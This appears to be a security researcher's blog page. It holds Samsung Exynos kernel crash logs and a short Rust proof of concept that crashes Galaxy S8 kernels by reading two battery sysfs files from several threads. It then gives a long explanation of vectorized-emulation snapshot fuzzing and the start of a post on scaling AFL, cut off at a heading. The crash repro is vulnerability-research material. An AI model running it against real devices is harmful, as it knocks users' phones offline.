Internal error: Oops - BUG: 96000004 [#1] PREEMPT SMP
exynos-snapshot: item - log_kevents is disabled
CPU: 4 PID: 9022 Comm: lulandroid Tainted: G        W    3.10.61-8299335 #1
task: ffffffc01049cc00 ti: ffffffc002824000 task.ti: ffffffc002824000
PC is at sysfs_open_file+0x4c/0x208
LR is at sysfs_open_file+0x40/0x208
pc : [<ffffffc00034e124>] lr : [<ffffffc00034e118>] pstate: 60000045
sp : ffffffc002827b70

G920F (Exynos Galaxy S6) [G920FXXU5DQBC] (Febuary 1, 2017) Now gated by selinux :(

sec_debug_store_fault_addr 0xffffff80000fe008
Unhandled fault: synchronous external abort (0x96000010) at 0xffffff80000fe008
------------[ cut here ]------------
Kernel BUG at ffffffc0003b6558 [verbose debug info unavailable]
Internal error: Oops - BUG: 96000010 [#1] PREEMPT SMP
exynos-snapshot: core register saved(CPU:0)
CPUMERRSR: 0000000012100088, L2MERRSR: 00000000111f41b8
exynos-snapshot: context saved(CPU:0)
exynos-snapshot: item - log_kevents is disabled
CPU: 0 PID: 5241 Comm: hookah Tainted: G        W      3.18.14-9519568 #1
Hardware name: Samsung UNIVERSAL8890 board based on EXYNOS8890 (DT)
task: ffffffc830513000 ti: ffffffc822378000 task.ti: ffffffc822378000
PC is at samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
LR is at samsung_pinconf_dbg_show+0x88/0xb0
Call trace:
[<ffffffc0003b6558>] samsung_pin_dbg_show_by_type.isra.8+0x28/0x68
[<ffffffc0003b661c>] samsung_pinconf_dbg_show+0x84/0xb0
[<ffffffc0003b66d8>] samsung_pinconf_group_dbg_show+0x90/0xb0
[<ffffffc0003b4c84>] pinconf_groups_show+0xb8/0xec
[<ffffffc0002118e8>] seq_read+0x180/0x3ac
[<ffffffc0001f29b8>] vfs_read+0x90/0x148
[<ffffffc0001f2e7c>] SyS_read+0x44/0x84

G950F (Exynos Galaxy S8) [G950FXXU4CRI5] (September 1, 2018)

Can crash by getting PC in the kernel. Probably a race condition heap corruption. Needs a groom.

(This PC crash is old, since it’s corruption this is some old repro from an unknown version, probably April 2018 or so)

task: ffffffc85f672880 ti: ffffffc8521e4000 task.ti: ffffffc8521e4000
PC is at jopp_springboard_blr_x2+0x14/0x20
LR is at seq_read+0x15c/0x3b0
pc : [<ffffffc000c202b0>] lr : [<ffffffc00024a074>] pstate: a0000145
sp : ffffffc8521e7d20
x29: ffffffc8521e7d30 x28: ffffffc8521e7d90
x27: ffffffc029a9e640 x26: ffffffc84f10a000
x25: ffffffc8521e7ec8 x24: 00000072755fa348
x23: 0000000080000000 x22: 0000007282b8c3bc
x21: 0000000000000e71 x20: 0000000000000000
x19: ffffffc029a9e600 x18: 00000000000000a0
x17: 0000007282b8c3b4 x16: 00000000ff419000
x15: 000000727dc01b50 x14: 0000000000000000
x13: 000000000000001f x12: 00000072755fa1a8
x11: 00000072755fa1fc x10: 0000000000000001
x9 : ffffffc858cc5364 x8 : 0000000000000000
x7 : 0000000000000001 x6 : 0000000000000001
x5 : ffffffc000249f18 x4 : ffffffc000fcace8
x3 : 0000000000000000 x2 : ffffffc84f10a000
x1 : ffffffc8521e7d90 x0 : ffffffc029a9e600

PC: 0xffffffc000c20230:
0230  128001a1 17fec15d 128001a0 d2800015 17fec46e 128001b4 17fec62b 00000000
0250  01bc8a68 ffffffc0 d503201f a9bf4bf0 b85fc010 716f9e10 712eb61f 54000040
0270  deadc0de a8c14bf0 d61f0000 a9bf4bf0 b85fc030 716f9e10 712eb61f 54000040
0290  deadc0de a8c14bf0 d61f0020 a9bf4bf0 b85fc050 716f9e10 712eb61f 54000040
02b0  deadc0de a8c14bf0 d61f0040 a9bf4bf0 b85fc070 716f9e10 712eb61f 54000040
02d0  deadc0de a8c14bf0 d61f0060 a9bf4bf0 b85fc090 716f9e10 712eb61f 54000040
02f0  deadc0de a8c14bf0 d61f0080 a9bf4bf0 b85fc0b0 716f9e10 712eb61f 54000040
0310  deadc0de a8c14bf0 d61f00a0 a9bf4bf0 b85fc0d0 716f9e10 712eb61f 54000040

PoC

extern crate rand;

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // These are the 2 files we want to fuzz
    let random_paths = [
        "/sys/devices/platform/battery/power_supply/battery/mst_switch_test",
        "/sys/devices/platform/battery/power_supply/battery/batt_wireless_firmware_update"
    ];

    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    loop {
        // Pick a random file
        let file = &random_paths[rand::random::<usize>() % random_paths.len()];

        // Read a random number of bytes from the file
        if let Ok(mut fd) = File::open(file) {
            let rsz = rand::random::<usize>() % (buf.len() + 1);
            let _ = fd.read(&mut buf[..rsz]);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

Vectorized Emulation: Hardware accelerated taint tracking at 2 trillion instructions per second

14 October 2018 at 21:37

This is the introduction of a multipart series. It is to give a high level overview without really deeply diving into any individual component.

Read the next post in the series: MMU Design

Vectorized emulation, why do I do this to myself?

Why

Changelog

Date Info
2018-10-14 Initial

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Performance disclaimer

All benchmarks done here are on a single Xeon Phi 7210 with 96 GiB of RAM. This comes out to about $4k USD, but if you cheap out on RAM and buy used Phis you could probably get the same setup for $1k USD.

This machine has 64 cores and 256 hardware threads. Using AVX-512 I run 4096 32-bit VMs at a time ((512 / 32) * 256).

All performance numbers in this article refer to the machine running at 100% on all cores.

Terminology

Term Inology
Lane A single component in a larger vector (often 32-bit throughout this document)
VM A single VM, in terms of vectorized emulation it refers to a single lane of a vector

Intro

In this blog I’m going to introduce you to a concept I’ve been working on for almost 2 years now. Vectorized emulation. The goal is to take standard applications and JIT them to their AVX-512 equivalent such that we can fuzz 16 VMs at a time per thread. The net result of this work allows for high performance fuzzing (approx 40 billion to 120 billion instructions per second [the 2 trillion clickbait number is theoretical maximum]) depending on the target, while gathering differential coverage on code, register, and memory state.

By gathering more than just code coverage we are able to track state of code deeper than just code coverage itself, allowing us to fuzz through things like memcmp() without any hooks or static analysis of the target at all.

Further since we’re running emulated code we are able to run a soft MMU implementation which has byte-level permissions. This gives us stronger-than-ASAN memory protections, making bugs fail faster and cleaner.

How it came to be an idea

My history with fuzzing tools starts off effectively with my hypervisor for fuzzing, falkervisor. falkervisor served me well for quite a long time, but my work rotated more towards non-x86 targets, which it did not support. With a demand for emulation I made modifications to QEMU for high-performance fuzzing, and ultimately swapped out their MMU implementation for my own which has byte-level permissions. This new byte-level permission model allowed me to catch even the smallest memory corruptions, leading to finding pretty fun bugs!

More and more after working with QEMU I got annoyed. It’s designed for whole systems yet I was using it for fuzzing targets that were running with unknown hardware and running from dynamically dumped memory snapshots. Due to the level of abstraction in QEMU I started to get concerned with the potential unknowns that would affect the instrumentation and fuzzing of targets.

I developed my first MIPS emulator. It was not designed for performance, but rather purely for simple usage and perfect single stepping. You step an instruction, registers and memory get updated. No JIT, no intermediate registers, no flushing or weird block level translation changes. I eventually made a JIT for this that maintained the flush-state-every-instruction model and successfully used it against multiple targets. I also developed an ARM emulator somewhere in this timeframe.

When early 2017 rolls around I’m bored and want to buy a Xeon Phi. Who doesn’t want a 64-core 256-thread single processor? I really had no need for the machine so I just made up some excuse in my head that the high bandwidth memory on die would make reverting snapshots faster. Yeah… like that really matters? Oh well, I bought it.

While the machine was on the way I had this idea… when fuzzing from a snapshot all VMs initially start off fuzzing with the exact same state, except for maybe an input buffer and length being changed. Thus they do identical operations until user-controlled data is processed. I’ve done some fun vectorization work before, but what got me thinking is why not just emit vpaddd instead of add when JITting, and now I can run 16 VMs at a time!

Alas… the idea was born

A primer on snapshot fuzzing

Snapshot fuzzing is fundamental to this work and almost all fuzzing work I have done from 2014 and beyond. It warrants its own blog entirely.

Snapshot fuzzing is a method of fuzzing where you start from a partially-executed system state. For example I can run an application under GDB, like a parser, put a breakpoint after the file/network data has been read, and then dump memory and register state to a core dump using gcore. At this point I have full memory and register state for the application. I can then load up this core dump into any emulator, set up memory contents and permissions, set up register state, and continue execution. While this is an example with core dumps on Linux, this methodology works the same whether the snapshot is a core dump from GDB, a minidump on Windows, or even an exotic memory dump taken from an exploit on a locked-down device like a phone.

All that matters is that I have memory state and register state. From this point I can inject/modify the file contents in memory and continue execution with a new input!

It can get a lot more complex when dealing with kernel state, like file handles, network packets buffered in the kernel, and really anything that syscalls. However in most targets you can make some custom rigging using strace to know which FDs line up, where they are currently seeked, etc. Further a full system snapshot can be used instead of a single application and then this kernel state is no longer a concern.

The benefits of snapshot fuzzing are performance (linear scaling), high levels of introspection (even without source or symbols), and most importantly… determinism. Unless the emulator has bugs snapshot fuzzing is typically deterministic (sometimes relaxed for performance). Find some super exotic race condition while snapshot fuzzing? Well, you can single step through with the same input and now you can look at the trace as a human, even if it’s a 1 in a billion chance of hitting.

A primer on vectorized instruction sets

Since the 90s many computer architectures have some form of SIMD (vectorized) instruction set. SIMD stands for single instruction multiple data. This means that a single instruction performs an operation (typically the same) on multiple different pieces of data. SIMD instruction sets fall under names like MMX, SSE, AVX, AVX512 for x86, NEON for ARM, and AltiVec for PPC. You’ve probably seen these instructions if you’ve ever looked at a memcpy() implementation on any 64-bit x86 system. They’re the ones with the gross 15 character mnemonics and registers you didn’t even know existed.

For a simple case lets talk about standard SSE on x86. Since x86_64 started with the Pentium 4 and the Pentium 4 had up to SSE3 implementations, almost any x86_64 compiler will generate SSE instructions as they’re always valid on 64-bit systems.

SSE provides 128-bit SIMD operations to x86. SSE introduced 16 128-bit registers named xmm0 through xmm15 (only 8 xmm registers on 32-bit x86). These 128-bit registers can be treated as groups of different sized smaller pieces of data which sum up to 128 bits.

  • 4 single precision floats
  • 2 double precision floats
  • 2 64-bit integers
  • 4 32-bit integers
  • 8 16-bit integers
  • 16 8-bit integers

Now with a single instruction it is possible to perform the same operation on multiple floats or integers. For example there is an instruction paddd, which stands for packed add dwords. This means that the 128-bit registers provided are treated as 4 32-bit integers, and an add operation is performed.

Here’s a real example, adding xmm0 and xmm1 together treating them as 4 individual 32-bit integer lanes and storing them back into xmm0

paddd xmm0, xmm1

Register Dword 1 Dword 2 Dword 3 Dword 4
xmm0 5 6 7 8
xmm1 10 20 30 40
xmm0 (result) 15 26 37 48

Cool. Starting with AVX these registers were expanded to 256-bits thus allowing twice the throughput per instruction. These registers are named ymm0 through ymm15. Further AVX introduced three operand form instructions which allow storing a result to a different register than the ones being used in the operation. For example you can do vpaddd ymm0, ymm1, ymm2 which will add the 8 individual 32-bit integers in ymm1 and ymm2 and store the result into ymm0. This helps a lot with register scheduling and prevents many unnecessary movs just to save off registers before they are clobbered.

AVX-512

AVX-512 is a continuation of x86’s SIMD model by expanding from 16 256-bit registers to 32 512-bit registers. These registers are named zmm0 through zmm31. Further AVX-512 introduces 8 new kmask registers named k0 through k7 where k0 has a special meaning.

The kmask registers are used to perform masking on instructions, either by merging or zeroing. This makes it possible to loop through data and process it while having conditional masking to disable operations on a given lane of the vector.

The syntax for the common instructions using kmasks are the following:

vpaddd zmm0 {k1}, zmm1, zmm2

chart simplified to show 4 lanes instead of 16

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 9 9 9 9
zmm1 1 2 3 4
zmm2 10 20 30 40
k1 1 0 1 1
zmm0 (result) 11 9 33 44

or

vpaddd zmm0 {k1}{z}, zmm1, zmm2

chart simplified to show 4 lanes instead of 16

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 9 9 9 9
zmm1 1 2 3 4
zmm2 10 20 30 40
k1 1 0 1 1
zmm0 (result) 11 0 33 44

The first example uses k1 as the kmask for the add operation. In this case the k1 register is treated as a 16-bit number, where each bit corresponds to each of the 16 32-bit lanes in the 512-bit register. If the corresponding bit in k1 is zero, then the add operation is not performed and that lane is left unchanged in the resultant register.

In the second example there is a {z} suffix on the kmask register selection, this means that the operation is performed with zeroing rather than merging. If the corresponding bit in k1 is zero then the resultant lane is zeroed out rather than left unchanged. This gets rid of a dependency on the previous register state of the result and thus is faster, however it might not be suitable for all applications.

The k0 mask is implicit and does not need to be specified. The k0 register is hardwired to having all bits set, thus the operation is performed on all lanes unconditionally.

Prior to AVX-512 compare instructions in SIMD typically yielded all ones in a given lane if the comparision was true, or all zeroes if it was false. In AVX-512 comparison instructions are done using kmasks.

vpcmpgtd k2 {k1}, zmm10, zmm11

You may have seen this instruction in the picture at the start of the blog. What this instruction does is compare the 16 dwords in zmm10 with the 16 dwords in zmm11, and only performs the compare on lanes enabled by k1, and stores the result of the compare into k2. If the lane was disabled due to k1 then the corresponding bit in the k2 result will be zero. Meaning the only set bits in k2 will be from enabled lanes which were greater in zmm10 than in zmm11. Phew.

Vectorized emulation

Now that you’ve made it this far you might already have some gears turning in your head telling you where this might be going next.

Since with snapshot fuzzing we start executing the same code, we are doing the same operations. This means we can convert the x86 instructions to their vectorized counterparts and run 16 VMs at a time rather than just one.

Let’s make up a fake program:

mov eax, 5
mov ebx, 10
add eax, ebx
sub eax, 20

How can we vectorize this code?

; Register allocation:
; eax = zmm0
; ebx = zmm1

vpbroadcastd zmm0, dword ptr [memory containing constant 5]
vpbroadcastd zmm1, dword ptr [memory containing constant 10]
vpaddd       zmm0, zmm0, zmm1
vpsubd       zmm0, zmm0, dword ptr [memory containing constant 20] {1to16}

Well that was kind of easy. We’ve got a few new AVX concepts here. We’re using the vpbroadcastd instruction to broadcast a dword value to all lanes of a given ZMM register. Since the Xeon Phi is bottlenecked on the instruction decoder it’s actually faster to load from memory than it is to load an immediate into a GPR, move this into a XMM register, and then broadcast it out.

Further we introduce the {1to16} broadcasting that AVX-512 offers. This allows us to use a single dword constant value with in our example vpsubd. This broadcasts the memory pointed to to all 16 lanes and then performs the operation. This saves one instruction as we don’t need an explicit vpbroadcastd.

In this case if we executed this code with any VM state we will have no divergence (no VMs do anything different), thus this example is very easy. It’s pretty much a 1-to-1 translation of the non-vectorized x86 to vectorized x86.

Alright, let’s try one a bit more complex, this time let’s work with VMs in different states:

add eax, 10

becomes

; Register allocation:
; eax = zmm0

vpaddd zmm0, zmm0, dword ptr [memory containing constant 10] {1to16}

Let’s imagine that the value in eax prior to execution is different, let’s say it’s [1, 2, 3, 4] for 4 different VMs (simplified, in reality there are 16).

Register Dword 1 Dword 2 Dword 3 Dword 4
zmm0 1 2 3 4
const 10 10 10 10
zmm0 (result) 11 12 13 14

Oh? This is exactly what AVX is supposed to do… so it’s easy?

Okay it’s not that easy

So you might have noticed we’ve dodged a few things here that are hard. First we’ve ignored memory operations, and second we’ve ignored branches.

Lets talk a bit about AVX memory

With AVX-512 we can load and store directly from/to memory, and ideally this memory is aligned as 512-bit registers are whole 64-byte cache lines. In AVX-512 we use the vmovdqa32 instruction. This will load an entire aligned 64-byte piece of memory into a ZMM register ala vmovdqa32 zmm0, [memory], and we can store with vmovdqa32 [memory], zmm0. Further when using kmasks with vmovdqa32 for loads the corresponding lane is left unmodified (merge masking) or zeroed (zero masking). For stores the value is simply not written if the corresponding mask bit is zero.

That’s pretty easy. But this doesn’t really work well when we have 16 unique VMs we’re running with unique address spaces.

… or does it?

VM memory interleaving

Since most VM memory operations are not affected by user input, and thus are the same in all VMs, we need a way to organize the 16 VMs memory such that we can access them all quickly. To do this we actually interleave all 16 VMs at the dword level (32-bit). This means we can perform a single vmovdqa32 to load or store to memory for all 16 VMs as long as they’re accessing the same address.

This is pretty simple, just interleave at the dword level:

chart simplified to show 4 lanes instead of 16

Guest Address Host Address Dword 1 Dword 2 Dword 3 Dword 16
0x0000 0x0000 1 2 3 33
0x0004 0x0040 32 74 55 45
0x0008 0x0080 24 24 24 24

All we need to do is take the guest address, multiply it by 16, and then vmovdqa32 from/to that address. It once again does not matter what the contents of the memory are for each VM and they can differ. The vmovdqa32 does not care about the memory contents.

In reality the host address is not just the guest address multiplied by 16 as we need some translation layer. But that will get it’s own entire blog. For now let’s just assume a flat, infinite memory model where we can just multiply by 16.

So what are the limitations of this model?

Well when reading bytes we must read the whole dword value and then shift and mask to extract the specific byte. When writing a byte we need to read the memory first, shift, mask, and or in the new byte, and write it out. And when doing non-aligned operations we need to perform multiple memory operations and combine the values via shifting and masking. Luckily compilers (and programmers) typically avoid these unaligned operations and they’re rare enough to not matter much.

Divergence

So far everything we have talked about does not care about the values it is operating on at all, thus everything has been easy so far. But in reality values do matter. There are 3 places where divergence matters in this entire system:

  • Loads/stores with different addresses
  • Branches
  • Exceptions/faults

Loads/stores with different addresses

Let’s knock out the first one real quick, loads and stores with different addresses. For all memory accesses we do a very quick horizontal comparison of all the lanes first. If they have the same address then we take a fast path and issue a single vmovdqa32. If their addresses differ than we simply perform 16 individual memory operations and emulate the behavior we desire. It technically can get a bit better as AVX-512 has scatter/gather instructions which allow the CPU to do this load/storing to different addresses for us. This is done with a base and an offset, with 32-bits it’s not possible to address the whole address space we need. However with 64-bit vectorization (8 64-bit VMs) we can leverage scatter/gather instructions to their fullest and all loads and stores just become a fast path with one vmovdqa32, or a slow (but fast) path where we use a single scatter/gather instruction.

Branches

We’ve avoided this until now for a reason. It’s the single hardest thing in vectorized emulation. How can we possibly run 16 VMs at a time if one branches to another location. Now we cannot run a AVX-512 instruction as it would be invalid for the VMs which have gone down a different path.

Well it turns out this isn’t a terribly hard problem on AVX-512. And when I say AVX-512 I mean specifically AVX-512. Feel free to ponder why this might be based on what you’ve learned is unique to AVX-512.

Okay it’s kmasks. Did you get it right? Well kmasks save our lives. Remember the merging kmasks we talked about which would disable updates to a given lane of a vector and ignore writes to a given lane if it is not enabled in the kmask?

Well by using a kmask register on all JITted AVX-512 instructions we can simply change the kmask to disable updates on a given VM.

What this allows us to do is start execution at the same location on all 16 VMs as they start with the same EIP. On all branches we will horizontally compare the branch targets and compute a new kmask value to use when we continue execution on the new branch.

AVX-512 doesn’t have a great way of extracting or broadcasting arbitrary elements of a vector. However it has a fast way to broadcast the 0th lane in a vector ala vpbroadcastd zmm0, xmm0. This takes the first lane from xmm0 and broadcasts it to all 16 lanes in zmm0. We actually never stop following VM #0. This means VM #0 is always executing, which is important for all of the horizontal compares that we talk about. When I say horizontal compare I mean a broadcast of the VM#0 and compare with all other VMs.

Let’s look in-detail at the entire JIT that I use for conditional indirect branches:

; IL operation is Beqz(val, true_target, false_target)
;
; val          - 16 32-bit values to conditionally branch by
; true_target  - 16 32-bit guest branch target addresses if val == 0
; false_target - 16 32-bit guest branch target addresses if val != 0
;
; IL pseudocode:
;
; if val == 0 {
;    goto true_target;
; } else {
;    goto false_target;
; }
;
; Register usage
; k1    - The execution kmask, this is the kmask used on all JITted instructions
; k2    - Temporary kmask, just used for scratch
; val   - Dynamically allocated zmm register containing val
; ttgt  - Dynamically allocated zmm register containing true_target
; ftgt  - Dynamically allocated zmm register containing false_target
; zmm0  - Scratch register
; zmm31 - Desired branch target for all lanes

; Compute a kmask `k2` which contains `1`s for the corresponding lanes
; for VMs which are enabled by `k1` and also have a non-zero value.
; TL;DR: k2 contains a mask of VMs which will be taking `ftgt`
vptestmd k2 {k1}, val, val

; Store the true branch target unconditionally, while not clobbering
; VMs which have been disabled
vmovdqa32 zmm31 {k1}, ttgt

; Store the false branch target for VMs not taking the branch
; Note the use of k2
vmovdqa32 zmm31 {k2}, ftgt

; At this point `zmm31` contains the targets for all VMs. Including ones
; that previously got disabled.

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; ...
; Now just rip out the target for VM #0 and translate the guest address
; into the host JIT address and jump there.
; Or break out and generate the JIT if it hasn't been hit before

The above code is quite fast and isn’t a huge performance issue, especially as we’re running 16 VMs at a time and branches are “rare” with respect to expensive operations like memory loads and stores.

One thing that is important to note is that zmm31 always contains the last desired branch target for a given VM. Even after it has been disabled. This means that it is possible for a VM which has been disabled to come back online if VM #0 ends up going to the same location.

Lets go through a more thorough example:

; Register allocation:
; ebx - Pointer to some user controlled buffer
; ecx - Length of controlled buffer

; Validate buffer size
cmp ecx, 4
jne .end

; Fallthrough
.next:

; Check some magic from the buffer
cmp dword ptr [ebx], 0x13371337
jne .end

; Fallthrough
.next2:

; Conditionally jump to end, for clarity
jmp .end

.end:

And the theoretical vectorized output (not actual JIT output):

; Register allocation:
; zmm10 - ebx
; zmm11 - ecx
; k1    - The execution kmask, this is the kmask used on all JITted instructions
; k2    - Temporary kmask, just used for scratch
; zmm0  - Scratch register
; zmm8  - Scratch register
; zmm31 - Desired branch target for all lanes

; Compute kmask register for VMs which have `ecx` == 4
vpcmpeqd k2 {k1}, zmm11, dword ptr [memory containing 4] {1to16}

; Update zmm31 to reference the respective branch target
vmovdqa32 zmm31 {k1}, address of .end  ; By default we go to end
vmovdqa32 zmm31 {k2}, address of .next ; If `ecx` == 4, go to .next

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; Branch to where VM #0 is going (simplified)
jmp where_vm0_wants_to_go

.next:

; Magicially load memory at ebx (zmm10) into zmm8
vmovdqa32 zmm8, complex_mmu_operation_and_stuff

; Compute kmask register for VMs which have packet contents 0x13371337
vpcmpeqd k2 {k1}, zmm8, dword ptr [memory containing 0x13371337] {1to16}

; Go to .next2 if memory is 0x13371337, else go to .end
vmovdqa32 zmm31 {k1}, address of .end   ; By default we go to end
vmovdqa32 zmm31 {k2}, address of .next2 ; If contents == 0x13371337 .next2

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; Branch to where VM #0 is going (simplified)
jmp where_vm0_wants_to_go

.next2:

; Everyone still executing is unconditionally going to .end
vmovdqa32 zmm31 {k1}, address of .end

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

.end:

Okay so what does the VM state look like for a theoretical version (simplified to 4 VMs):

Starting state, all VMs enabled with different memory contents (pointed to by ebx) and different packet lengths:

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 1 1 1

First branch, all VMs with ecx != 4 are disabled and are pending branches to .end, VM #1 falls off

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 0 1 1
Zmm31 .next .end .next .next

Second branch, VMs without 0x13371337 in memory are pending branches to .end, VM #2 falls off

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 0 0 1
Zmm31 .next2 .end .end .next2

Final branch, everyone ends up at .end, all VMs are enabled again as they’re following VM #0 to .end

Register VM 0 VM 1 VM 2 VM 3
ecx 4 3 4 4
memory 0x13371337 0x13371337 3 0x13371337
K1 1 1 1 1
Zmm31 .end .end .end .end

Branch summary

So we saw branches will disable VMs which do not follow VM #0. When VMs are disabled all modifications to their register states or memory states are blocked by hardware. The kmask mechanism allows us to keep performance up and not use different JITs based on different branch states.

Further, VMs can come back online if they were pending to go to a location which VM #0 eventually ends up going to.

Exceptions/faults

These are really just glorified branches with a VM exit to save the input and memory/register state related to the crash. No reason to really go in depth here.



Okay but why?

Okay we’ve covered all the very high level details of how vectorized emulation is possible but that’s just academic thought. It’s pointless unless it accomplishes something.

At this point all of the next topics are going to be their own blogs and thus are only lightly touched on

Differential coverage / Hardware accelerated taint tracking

Differential coverage is a special type of coverage that we are able to gather with this vectorized emulation model. This is the most important aspect of all of this tooling and is the main reason it is worth doing.

Since we are running 16 VMs at a time we are able to very cheaply (a few cycles) do a horizontal comparison with other VMs. Since VMs are deterministic and only have differing user-controlled inputs any situation where VMs have different branches, different register states, different memory states, etc is when the user input directly or indirectly caused a change in behavior.

I would consider this to be the holy grail of coverage. Any affect the input has on program state we can easily and cheaply detect.

How differential coverage combats state explosion

If we wanted to track all register states for all instructions the state explosion would be way too huge. This can be somewhat capped by limiting the amount of state each instruction can generate. For example instead of storing all unique register values for an instruction we could simply store the minimums and maximums, or store up to n unique values, etc. However even when limited to just a few values per instruction, the state explosion is too large for any real application.

However, since most memory and register states are not influenced by user input, with differential coverage we can greatly reduce the amount of instructions which state is stored on as we only store state that was influenced by user data.

This works for code coverage as well, for example if we hit a printf with completely uncontrolled parameters that would register as potentially hundreds of new blocks of coverage. With differential coverage all of this state can be ignored.

How differential coverage is great for performance

While the focus of this tool is not performance, the performance costs of updating databases on every instruction is not feasible. By filtering only instructions which have user-influenced data we’re able to perform much more complex operations in the case that new coverage was detected.

For example all of my register loads and stores start with a horizontal compare and a quick jump out if they all match. If one differs it’s a rare enough occasion that it’s feasible to spend a few more cycles to do a hash calculation based on state and insertion into the global input and coverage databases. Without differential coverage I would have to unconditionally do this every instruction.

Soft MMU

Since the soft MMU deserves a blog entirely on it’s own, we’ll just go slightly into the details.

As mentioned before, we interleave memory at the dword level, but for every byte there is also a corresponding permission byte. In memory this looks like 16 32-bit dwords representing the permissions, followed by 16 32-bit dwords containing their corresponding memory contents. This allows me to read a 64-byte cache line with the permissions which are checked first, followed by reading the 64-byte cache line directly following with the contents.

For permissions: the read, write, and execute bits are completely separate. This allows more exotic memory models like execute-only memory.

Since permissions are at the byte level, this means we can punch a one-byte hole anywhere in memory and accessing that byte would cause a fault. For some targets I’ll do special modifications to permissions and punch holes in unused or padding fields of structures to catch overflows of buffers contained inside structures.

Further I have a special read-after-write (RaW) bit, which is used to mark memory as uninitialized. Memory returned from allocators is marked as RaW and thus will fault if ever read before written to. This is tracked at the byte level and is one of the most useful features of the MMU. We’ll talk about how this can be made fast in a subsequent blog.

Performance

Performance is not the goal of this project, however the numbers are a bit better than expected from the theorycrafting.

In reality it’s possible to hit up to 2 trillion emulated instructions per second, which is the clickbait title of this blog. However this is on a 32-deep unrolled loop that is just adding numbers and not hitting memory. This unrolling makes the branch divergence checking costs disappear, and integer operations are almost a 1-to-1 translation into AVX-512 instructions.

For a real target the numbers are more in the 40 billion to 120 billion emulated instructions per second range. For a real target like OpenBSD’s DHCP client I’m able to do just over 5 million fuzz cases per second (fuzz case is one DHCP transaction, typically 1 or 2 packets). For this specific target the emulation speed is 54 billion instructions per second. This is while gathering PC-level coverage and all register and memory divergence coverage.

So it’s just academic?

I’ve been working on this tooling for almost 2 years now and it’s been usable since month 3. It’s my primary tool for fuzzing and has successfully found bugs in various targets. Sadly most of these bugs are not public yet, but soon.

This tool was used to find a remote bluescreen in Windows Firewall: CVE-2018-8206 (okay technically I found it first manually, but was able to find it with the fuzzer with a byte flipper even though it has much more complex constraints)

It was also used to find a theoretical OOB in OpenBSD’s dhclient: dhclient bug . This is a fun one as really no tradtional fuzzer would find this as it’s an out-of-bounds by 1 inside of a structure.

Future blogs

  • Description of the IL used, as it’s got some specific designs for vectorized emulation

  • Internal details of the MMU implementation

  • Showing the power of differential coverage by looking a real example of fuzzing an HTTP parser and having a byte flipper quickly (under 5 seconds) find the basic “VERB HTTP/number.number\r\n". No magic, no `strings` feedback, no static analysis. Just a useless fuzzer with strong harnessing.

  • Talk about the new IL which handles graphs and can do cross-block optimizations

  • Showing better branch divergence handling via post-dominator analysis and stepping VMs until they sync up at a known future merge point

Scaling AFL to a 256 thread machine

16 September 2018 at 22:51

That's a lot of cores

Changelog

Date Info
2018-09-16 Initial
2018-09-16 Changed custom JPEG test program a little, saves 2 syscalls bringing us from 9 per fuzz case to 7 fuzz case. Used -O2 flag to build. Neither of these had a noticeable impact on performance thus performance numbers were not updated.

Performance disclaimer

Performance is critical to my work and I’ve been researching specifically fuzzer performance and scaling for the past 5 years. It’s important that the performance numbers here are accurate and use tooling to their fullest. Please let me know about any suggestions that I could do to make these numbers better while still using unmodified AFL. I also was using a stock libjpeg as I do not want to make internal mods to JPEG as that increases risk of invalid results.

The machine this testing was done on is a single socket Intel Xeon Phi 7210 a 64-core 256-thread machine (yes, 4 HW threads per core). This is clocked at 1.3 GHz and the cores are effectively Atom cores, making the much weaker than conventional ones. A single 1.3 GHz Phi core here usually runs identical code about 10-20x slower than a conventional modern Xeon at 2.8 GHz. This means that numbers here might seem unreasonably low compared to what you may expect, but it’s because these are weak cores.

Intro

I’ve been trying to get AFL to scale correctly for the past day, which turns out to be fairly hard. AFL doesn’t really provide any built in way of just spinning up multiple cores by using something like afl-fuzz -j64 ..., so we have to do it ourselves. Further the machine I’m trying this on is quite exotic and not much scales correctly to it anyways. But, let’s hop right on in and give it a go! This testing is actually being done for an upcoming blog series demonstrating a neat new way of fuzzing and harnessing that I call “Vectorized Emulation”. I wanted to get the best performance numbers out of AFL so I had a reasonable comparison that would make some of the tech a bit more relatable. Stay tuned for that post hopefully within a week!

In this blog I’m going to talk about the major things to keep an eye on when you’re trying to get every drop of performance:

  • Are you using all your cores?
  • Are you scaling well?
  • Are you spending time in your actual target or other things like the kernel?

If you’re just spinning up one process per core, it’s very possible that all of these are not true. We’ll go through a real example of this process and how easy it is to fall into a trap of not effectively using your cores.

Target selection

First of all, we need a good target that we can try to fuzz as fast as possible. Something that is common, reasonably small, and easy to convert to use AFL persistent mode. I’ve decided to look at libjpeg-turbo as it’s a common target, many people are probably already familiar, and it’s quite simple to just throw in a loop. Further if we found a bug it’d be a pretty good day, so it’s always fun to play with real targets.

Fuzzing out of the can

